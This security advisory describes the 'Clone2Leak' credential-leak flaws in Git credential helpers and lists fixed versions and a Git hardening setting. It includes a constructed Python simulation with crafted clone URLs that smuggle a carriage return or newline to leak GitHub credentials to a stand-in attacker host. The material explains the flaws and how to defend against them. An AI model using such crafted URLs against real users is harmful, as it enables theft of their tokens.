
Security researcher RyotaK from GMO Flatt Security has uncovered three interconnected vulnerabilities, collectively named ‘Clone2Leak,’ affecting major Git-based tools and services. All three abuse the way Git and its credential helpers exchange authentication requests: a line-based text protocol of `key=value` pairs in which a smuggled or injected line, or an over-broad host check, makes the helper hand over stored credentials that are then sent to an attacker-controlled server.
Affected Systems:
– GitHub Desktop
– Git LFS
– GitHub CLI/Codespaces
– Git Credential Manager
The Three Attack Vectors:
1. Carriage Return Smuggling (CVE-2025-23040 for GitHub Desktop, CVE-2024-50338 for Git Credential Manager)
– Git rejected newlines in the values it passes to a credential helper, but not carriage returns (`\r`).
– A helper whose line reader also accepts `\r` as a line terminator therefore sees one extra `key=value` pair, such as a second `host=github.com`, that Git never meant to send.
– The helper returns credentials for the smuggled host, and Git sends them to the attacker-controlled server named in the original URL.
2. Newline Injection (CVE-2024-53263)
– Targets Git LFS, which builds its own credential request from the `lfs.url` value in a repository's `.lfsconfig`.
– Git LFS did not reject newline characters in that value, so a crafted URL injects an extra line into the request.
– The helper answers with credentials for the injected host, which Git LFS then sends to the attacker's server.
3. Credential Retrieval Logic Flaws (CVE-2024-53858)
– Impacts GitHub CLI (`gh`) and GitHub Codespaces.
– The credential helper decided too loosely which hosts are entitled to the GitHub token, so it would return the token for hosts other than the one it was issued for.
– Cloning a malicious repository that points Git at such a host (for example from inside a Codespace) therefore leaks the token to the attacker.
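The protocol-level mechanism shared by the first two vectors, as an added, constructed illustration (this is not code from Git, Git Credential Manager, Git LFS or GitHub Desktop; the serializer, the two helper parsers, the credential store and the hostnames `attacker.example` / `github.com` are simplified stand-ins). A URL with a percent-encoded `%0d` in its user-info smuggles a second `host=` line past a helper that treats `\r` as a line ending; the same serializer shows the `\n` check that Git applies and that Git LFS's own request construction lacked, and the `credential.protectProtocol`-style refusal of `\r`.

```python
"""Constructed demo of control-character smuggling in Git's credential
helper protocol.  Not the real implementations: simplified stand-ins.

The protocol is line based.  Git writes `key=value\n` lines followed by a
blank line; the helper answers the same way.  Git always refused values
containing `\n`, but before 2.48.1 (credential.protectProtocol) it let `\r`
through, so a helper whose line reader also ends lines at `\r` sees one more
`key=value` pair than Git sent.
"""
from urllib.parse import unquote, urlsplit

# Constructed credential store, keyed by host the way real helpers are.
STORE = {"github.com": ("octocat", "ghp_EXAMPLETOKEN")}

# Constructed malicious clone URLs.  `%0d` / `%0a` sit in the user-info part,
# which Git percent-decodes before handing it to the helper.
CR_URL = "https://x%0dhost=github.com@attacker.example/repo.git"
LF_URL = "https://x%0ahost=github.com@attacker.example/repo.git"


def credential_request(url: str, protect_protocol: bool) -> bytes:
    """Serialize a helper request roughly the way Git does."""
    u = urlsplit(url)
    fields = [("protocol", u.scheme), ("host", u.hostname or "")]
    if u.username is not None:
        fields.append(("username", unquote(u.username)))
    out = []
    for key, value in fields:
        # Git has always rejected newlines and NULs in protocol values.
        if "\n" in value or "\0" in value:
            raise ValueError(f"{key}: newline or NUL in value")
        # credential.protectProtocol (Git >= 2.48.1, on by default) adds `\r`.
        if protect_protocol and "\r" in value:
            raise ValueError(f"{key}: carriage return in value")
        out.append(f"{key}={value}\n")
    return ("".join(out) + "\n").encode()


def parse_request(raw: bytes, cr_ends_line: bool) -> dict:
    """Parse a helper's stdin.

    cr_ends_line=True mimics a ReadLine()-style reader that accepts \r, \n or
    \r\n as a terminator (the vulnerable behaviour); False mimics a strict
    \n-only reader.  A repeated key overwrites the earlier value, as it does
    in real helpers.
    """
    text = raw.decode()
    if cr_ends_line:
        text = text.replace("\r\n", "\n").replace("\r", "\n")
    fields = {}
    for line in text.split("\n"):
        if line == "":
            break  # blank line terminates the request
        key, _, value = line.partition("=")
        fields[key] = value
    return fields


def helper_get(raw: bytes, cr_ends_line: bool):
    """Act as `helper get`: look up whatever host the parser ended up with."""
    return STORE.get(parse_request(raw, cr_ends_line).get("host", ""))


def clone(url: str, protect_protocol: bool, cr_ends_line: bool):
    """Simulate Git asking the helper, then sending the answer to the URL's
    host.  Returns (host_contacted, credential_or_None); a credential for
    github.com paired with attacker.example is the leak."""
    request = credential_request(url, protect_protocol)
    return urlsplit(url).hostname, helper_get(request, cr_ends_line)


def rejected(url: str, protect_protocol: bool) -> bool:
    """True if Git-side validation refuses to build the request at all."""
    try:
        credential_request(url, protect_protocol)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print("lenient helper, old Git :", clone(CR_URL, False, True))
    print("strict helper, old Git  :", clone(CR_URL, False, False))
    print("protectProtocol rejects :", rejected(CR_URL, True))
    print("newline always rejected :", rejected(LF_URL, False))
```

Running it shows the leak only in the first combination: a `\r`-tolerant helper fed by a Git without `credential.protectProtocol` returns the `github.com` credential while the connection goes to `attacker.example`. Either fix alone closes it, which is why the advisories patch both the helpers (strict `\n`-only line reading) and Git itself (refusing to serialize `\r`).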
Recommended Security Updates:
– GitHub Desktop: Version 3.4.12+
– Git Credential Manager: Version 2.6.1+
– Git LFS: Version 3.6.1+
– GitHub CLI: Version 2.63.0+
Additional Security Measure:
Upgrade Git itself to 2.48.1 or later, which introduces the `credential.protectProtocol` setting and enables it by default; with it on, Git refuses to pass values containing a carriage return to any credential helper, which blocks the smuggling vector regardless of the helper in use. Check that it has not been turned off with `git config --get credential.protectProtocol`, and set it explicitly with `git config --global credential.protectProtocol true` where needed.
No in-the-wild exploitation has been reported so far, but because a single `git clone` of a malicious repository (including one pulled in as a submodule) is enough to trigger these flaws, users are strongly advised to update the affected tools and Git itself immediately.